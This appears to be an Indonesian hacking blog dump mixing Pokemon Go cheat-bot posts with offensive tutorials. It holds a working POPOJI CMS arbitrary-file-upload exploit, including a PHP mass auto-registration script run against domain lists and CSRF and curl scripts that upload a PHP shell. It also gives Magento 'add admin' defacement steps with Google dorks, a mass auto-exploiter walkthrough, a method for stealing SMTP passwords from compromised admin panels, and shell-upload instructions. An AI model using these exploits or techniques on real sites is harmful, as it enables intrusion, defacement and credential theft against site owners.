How To Find Rare Pokemon [Simple Method]

Posted by Fatkhur On Minggu, 31 Juli 2016 0 komentar

How To Find Rare Pokemon [Simple Method]

How To Find Rare Pokemon [Simple Method] - catch 'em all... just not by hand.

How to Use 
1. Download bot
2. Extrack Bot
3. Edit File User.xml. Than input your username & pass
4. Open bot
5. Go to pokesnipers
6. input pokemon name
7. Copy the link of those direction" the last part of it separated by / is the location of the Pokemon. 
Example In my case it was : 40.788268154987, -73.968539742814 
8. got it

Indonesia : 
1. Download bot
2. Ekstrak botnya
3. Edit file user.xml , input username sama passnya
4. Buka botnya
5. Buka site pokesnipers.com
6. Masukin nama pokemonnya
7. Masukin letaknya
8. Dapet deh 


See 
[Bot PokemonGO] Download PokeCrot | New Update | Auto Bot Farmign Level UP Pokemon
How To Get UNBANNED From POKEMON GO !!!
Download PokeGOBot GreenGold Edition

If Succesfully : 




PokeSniper2 1.7
Can now choose which Pokemon to catch based on catch list, minimum CP, minimum IV. Added Logging. Bugfixes

Download Bot v2.1.7

*update 

PokeSniper2 1.8
Fixed API rate problem. Fixed autosniping Farfetch'd and Mr.Mime. Added settings <ShowUsernameInTitle> and <CatchEverything> for the autosniper.

Download 

POPOJI CMS Arbitrary File Upload

#- Title: POPOJI CMS Arbitrary File Upload
#- Author: Mr. Error 404
#- Team : IndoXploit
#- Published : 31/07/2016
#- Developer : popojicms
#- Link Download : popojicms .org/pages/rilis
#- Price : Free
#- Google Dork: "/po-admin/js/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 

PopojiCMS dibangun di atas Framework Popoji, sangat cocok dibuat website apa saja, bahkan sistem berbasi web untuk profesional. Developer bisa membuat engine berkelasnya sendiri tanpa harus pusing mengubah engine orang lain. PopojiCMS - Engine untuk para developer.

Vulnerability : 
site /po-admin/js/plugins/uploader/upload.php

When Vuln : 
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

Post :
array("file" => "@shell.jpg", "name" => "shell.php");



Method
1. Register on web target
2. Using POPOJI CMS Add Admin Auto Registration


<html>
<head>
<title>POPOJI CMS Add Admin Auto Registration</title>
<meta name="author" content="IndoXploit">
<style type="text/css">
html {
margin: 20px auto;
background: #000000;
color: #ffffff;
}
header {
color: lime;
font-size: 35px;
margin: 10px auto;
text-align: center;
text-decoration: underline;
}
input[type=text] {
border: 1px solid #008000;
color: #bb0000;
width: 500px;
height: 20px;
padding-left: 5px;
margin: 5px auto;
background: transparent;
}
input[type=submit] {
border: 1px solid #008000;
color: #bb0000;
background: transparent;
width: 500px;
}
textarea {
background: transparent;
color: #bb0000;
border: 1px solid #008000;
resize: none;
width: 500px;
height: 250px;
padding-left: 5px;
margin: 5px auto;
}
a {
text-decoration: none;
color: lime;
}
a:hover {
text-decoration: underline;
}
</style>
</head>
<?php
set_time_limit(0);
error_reporting(0);

function dav($url, $post=null) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if($post != null) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HHTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADER, 0);
return curl_exec($ch);
curl_close($ch);
}

$sites = explode("\r\n", $_POST['url']);
$user = "indoxploit";
$pass = $user;
$email = htmlspecialchars($_POST['email']);
if($_POST['hajar']) {
echo "<span style='font-size: 25px; text-decoration: underline; color: lime; margin-bottom: 20px;'>Result Gannnnn</span><p>";
if(!filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
foreach($sites as $url) {
if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
$url = "http://".$url;
} else {
$url = $url;
}
echo "[+] Nyecan -> $url<br>";
$post_register = array(
"username" => $user,
"email" => $email,
"password" => $pass,
"re-password" => $pass,
);
$register = dav("$url/po-admin/actregister.php", $post_register);
echo "[+] Register ";
if(!preg_match("/404|headers already sent|disabled for security reasons|Please type another email!/", $register) AND preg_match("/SUCCESS!!!|>Check your email for next step. Thank you!/", $register)) {
echo "<font color=lime>OK!</font><br>";
echo "[+] <font color=gold>Cek emailmu buat aktivasi</font><br>";
echo "[+] u/p: <font color=lime>$user</font><br><br>";
$post_login = array(
"username" => $user,
"password" => $pass,
);
} else {
echo "<font color=red>Gagal!</font><br><br>";
}
}
} else {
echo "<font color=red>Emailmu ga valid bosss, email harus valid biar bisa masuk token registrasinyaa.</font>";
}
} else {
?>
<center>
<header>POPOJI Auto Registration</header>
<form method="post">
Email: <br>
<input type="text" name="email" value="trciksterlicikarus@gmail.com" placeholder="email@asu.com" required><br>
Domains: <br>
<textarea name="url"></textarea><br>
<input type="submit" name="hajar" value="Xploit!">
</form>
</center>
<?php
}
?>
</html>
3. if Complete, check your email & verived your account
4. Login 


( Upload Shell )

Csrf


<form method="post" action="http://target.com/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="3xploi7.php">
<input type="submit" value="exploit">
</form>


Xampp



<?php

$url = "http://
target.com/po-admin/js/plugins/uploader/upload.php"; // put URL Here


$post = array
(
"file" => "@3xploi7.jpg",
"name" => "
3xploi7.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>







( Upload File )
1. Login
2. Upload your pic / html file in
 Account > change avatar

If Succesfully   > 



Shell Acces ?


[Bot PokemonGO] Download PokeCrot | New Update | Auto Bot Farmign Level UP Pokemon

[Bot PokemonGO] Download PokeCrot | New Update | Auto Bot Farmign Level UP Pokemon - PokeCrot is the Free bot for Pokemon Go, Simple Run bot and Farm without Visual Studio. You can reach more than 50000 EXP/Hour AND 20000 Stardust/Hour. This tool using Gui v1.7/v1.8/v1.9/v2.0/v2.1 - 2.7. And this tool need Net Framwork 4.5.2

Features
Update Version 1.2 
You Can Change your cordinate to start first location bot 
Add Multi Account , Human Walking
Add Filter Auto Transfer
Auto recycle item 
Auto Evolve
Fix Bot Crash with Added Auto Generate Token
New Map Location
Human Logic

How To Use
Extrak your file to desktop
setting your id & password in accountsGoogle.txt/accountsPtc.txt
Setting Account Google / PTC ( setting.ini |  True = Yes / False = No )
Setting Cordinate , Auto Transfer & Auto recycle ( setting.ini | True = Yes / False = No )
Setting Filter Recycle Item ( itemRecycleFilter.ini )
All done, and open pokecrot

How to fix if error
There's no error until today

See : 

Download

*Update : 
Pokecrot v3.8

Download

How To Get UNBANNED From POKEMON GO

Posted by Fatkhur On Kamis, 28 Juli 2016 0 komentar


How To Get UNBANNED From POKEMONGO - If your account got banned, what would you like to do ? Stop Playing Pokemon or sell your phone. dont worry, in here. i wanna give you tools to unbanned PokemonGO. The tool is QuickSpin

About QuickSpin 
QuickSpin is a tool to try to unban your softbanned account.
Uses the RocketAPI (GitHub)

How to use
Run QuickSpin.exe
QuickSpin will ask for the information it needs to unban your account.
If you use QuickSpin frequently, edit the included user.xml to quickly load your info.

- !
Make sure the location you enter into QuickSpin is the location you want to be at, otherwise you just end up getting softbanned again.
A successful unban is not guaranteed due to the nature of the exploit.
Feel free to try again if it didn't work the first time.
- !

Downloads =>>

Tutorial Deface Menggunakan Teknik Magento Add Admin

Posted by Fatkhur On Jumat, 01 Juli 2016 0 komentar


Yosh lah ane mw share nih tutorial deface dengan metode Magento Add Admin.
Pasti udh familiar kan nama ny yosh kali ini saya akan share tutor nya :D mungkin sedikit singkat yah karna saya lagi males ngetik ngantuk nih :D :v 

Oke tudepoin aja
Bahan – Bahan :
1. Pc/Lepi
2. Koneksi yg stabil
3. Script Deface
4. Notepad
5. Kesabaran
6. Xploit Add Admin Nya Bisa Disini Bisa Juga Disana
7. Dork : “sex” inurl:/index.php/customer/account/login (kembangin Lagi :P)

Tutorial Baca Simak Baik Baik :)
1. Buka gugel lalu masukan dorkny lalu kumpulin semua site yg ada di gugel ke notepad NB: untuk proses ini harus sabar :v ane jg cape pegel :v kumpulin min 50site biar gk sakit hati nanti :v
2. Klw udh terkumpul site ny copy paste ke xploit di atas
4. Tunggu sampe ada yg bacaan exploitasi sukses - login sukses - malang - malang87 <<<< Na itu tandany vuln bro :v
5. Masuk ke admin nya site.com/admin
6. Abis itu cek ada file system ny atw ngga cek di bagian system > file system > IDE itu untuk upload shell klw gk ada next aja ane share ny gk ada file system jadi ini mudah bisa tebas index 
7. Masuk Kebagian > System  > Configuration Seperti SS Di Bawah

8. Nah Abis Itu Masuk Kebagian Design Ada Di Bagian Kiri Seperti SS Di Bawah

9. Tinggal Copas Deh Sc Kamu Di Bagian Misscellaneous Script Tuh Form Kek Di Bawah

10. Save Dan Selesai Index Ke Tebas :D :)
Oke untuk upload shell gw udh share silahkan di search ajh di blog ini :) atau langsung ajh (Cara Tanem Shell)
Byeee :*

Keyword : cara deface magento , cara deface magento add admin , cara deface teknik magento add admin , magento

Hacker Atau Cracker

Posted by Fatkhur On 0 komentar

    Pagi semua :D kali ini saya akan membahas tentang Hacker atau Cracker. Apakah Hacker dan Cracker itu sama ? Lalu apakah perbedaan Hacker dan Cracker ?

    Jangan langsung beranggapan buruk dengan yang namanya Hacker, karena kalian mesti tahu apa Hacker sejati itu. Masalahnya, ada sekelompok orang yang menyebut dirinya seorang Hacker, padahal mereka itu seorang Cracker. Hacker sebenarnya tidak jahat sama sekali seperti yang kebanyakan dipikirkan orang. Hacker adalah sekumpulan atau sekelompok orang yang bertujuan mengembangkan ilmu pengetahuan dan berbagi informasi secara bebas dan tanpa batas. Hacker adalah seseorang yang tertarik untuk mengetahui secara mendalam mengenai kerja suatu sistem, komputer, dan juga jaringan komputer. Mereka terdiri dari para programer yang ahli jaringan. Mereka juga yang berjasa membangun Internet lewat pengembangan sistem operasi UNIX.


    Istilah Hacker sendiri lahir sekitar tahun 1959 dari MIT ( Massacussets Institute of Technology ), sebuah Universitas di Amerika. Saat itulah semua berawal, dari sebuah ruangan baru, "EAM Room" pada Building 26 MIT sebagai nenek moyang dari komputer yang kini kita kenal, mesin yang mampu membawa kita menuju kebebasan informasi yang lebih baik.

Para Hacker selalu bekerjasama secara sukarela menyelesaikan masalah dan membangun sesuatu. Mereka selalu berbagi informasi, memberi jawaban, serta berlomba-lomba untuk berbuat yang terbaik bagi lingkungannya. Mereka tidak pernah berhenti belajar untuk menjadi ahli dan sangat anti untuk melakukan sesuatu secara berulang-ulang dan membosankan.

    Sementara itu, para Cracker sibuk untuk memuaskan diri mereka dengan aktivitas cracking. Mulai dari membobol sistem komputer, menebar virus tanpa tujuan. Beberapa Hacker ada yang membuat virus namun dengan tujuan riset, dan lain-lain. Para Hacker menyebut mereka sebagai orang yang tidak bertanggung jawab. Jadi, sangat tidak adil jika kita menganggap Hacker itu adalah seorang yang jahat dan menakutkan karena sangat jelas bahwa Hacker bersifat membangun sementara Cracker bersifat merusak.

    Oke sekian dulu update kali ini, semoga bermanfaat.




Yosh gan balik lagi sama admin hehehe :D cepet banget yah perasaan kita baru ketemu 10 menit yg lalu :D hehehe setelah artikel sebelum nya mengenai Tutorial Add File System Magento kali ini admin akan share tutor auto exploiter nya nih 

Yosh langsung aja gan
Bahan 
1. Sc Exploiter Disini
2. Xampp Disini
3. Koneksi
4. Site Site Yang Mw Diexploit
5. Cemilan

Yosh Tutor Nya Langsung Aja Gan
1. Install Xampp Yg Tadi Di Download
2. Setelah Selesai Download Sc Exploiter Di Atas Save Dengan Nama cek.php Dan Simpan Di C:>Xampp>Php
3. Dorking Dulu Gan Jangan Lupa Ambil Site Site Nya Kumpulin Di Notepad Dengan Nama list.txt Save Di C:>Xampp>Php
4. Buka CMD Ketik cd c:\xampp\php
5. Lalu Ketik Lagi : php cek.php list.txt
6. Hasil Nya Seperti SS Dibawah  

Selesai deh udh gitu terserah ente mw ngapain aja :v  
Byeee :D

Keyword : cara deface magento , cara deface magento add admin , cara deface teknik magento add admin , magento


Yosh gan kembali lagi nih sama admin kali ini admin akan share lagi seputar magento :)
Kali ini admin share Tutorial Ngambil SMTP Di Magento. 

Yosh ini tutor ane share bukan untuk kriminal yah hanya untuk pengetahuan semata ;)
Kalau di pake karding kriminal apapun itu dosa kau tanggung sendiri admin hanya untuk pengetahuan semata

Yosh udh ceramah nya kita tudepoin gan 
Bahan - Bahan
1. Site Magento Yg Sudah Di Exploit Klw Blum Ada Cari Artikel Nya Disini
2. Pc Dan Koneksi
3. Cemilan :3

Yosh Langsung Tutornya Gan
- Pertama login admin dulu abis itu masuk ke
- system > configuration > view menu SMTP pro nah
- kalau ada SMTP PRO klik dan lihat username, password, port dan server nya dengan menggunakan inspect element untuk melihat password
- kalau password masih bentuk ******* ( inspect element > ganti value "password" dengan "text" ) Seperti di SS Bawah 
- Dan sudah selesai deh :D 

Singkat kali yaah artikel nya :D hehehe yg penting udh dapet pengetahuan gan ;)
Oke Stay Terus Yah Beb :* Next Artikel Adalah Magento Scanner + Auto Exploiter ;)

Keyword : cara deface magento , cara deface magento add admin , cara deface teknik magento add admin , magento

Yosh gan ketemu lagi sama admin heheheh :D kali ini admin akan share Tutorial Upload Shell Di Magento.
Oke tutorial ini tidak berlaku untuk semua web yah :) tutor ini hoki hokian aja :'v dah lah gk banyak cingcong :'v BERANGKATTT...... :"v

TUTOR INI BERGUNA UNTUK SITE YG TIDAK ADA FILE SYSTEM NYA (CAPSLOK JEBOL) :"v

Yosh pertama tama ente siapin dulu bahan - bahan nya cuz
1. File System Disini
2. Site Magento Yg Sudah Di Exploit (Bisa Login Admin) Bila Gk Ada Baca Artikel Disini
3. Cemilan :D


*Catatan: jika ada ketidak sesuaian/ditemukan error tdak sperti gambar yg saya sertakan brarti tidak bisa di upload file system! 

- Masuk ke System > Magento Connect > Magento Connect Manager


- Jika Vuln maka akan muncul form login, jadi lu harus login ulang. Setelah login lu akan masuk ke halam ini, lihat gambar dibawah, dan upload file systemnya



- Nanti akan otomatis scrolling ke bawah sendiri dan jika sukses akan muncul notif seperti gambar dibawah



- Balik lagi ke dashboard admin, scrol ke atas ja terus klik Return to Admin



- Sekarang lihat file system udah terinstall. Dah sampe disini terserah mo diapain. Untuk cara upload shell baca lagi di atas dah jelas




Oke udh ada file system terserah ente mw ngapain aja :'v oke udh dulu yah 
Stay Terus Brada :*
Byeee :D

Keyword : cara deface magento , cara deface magento add admin , cara deface teknik magento add admin , magento

SC By : yuzarc0der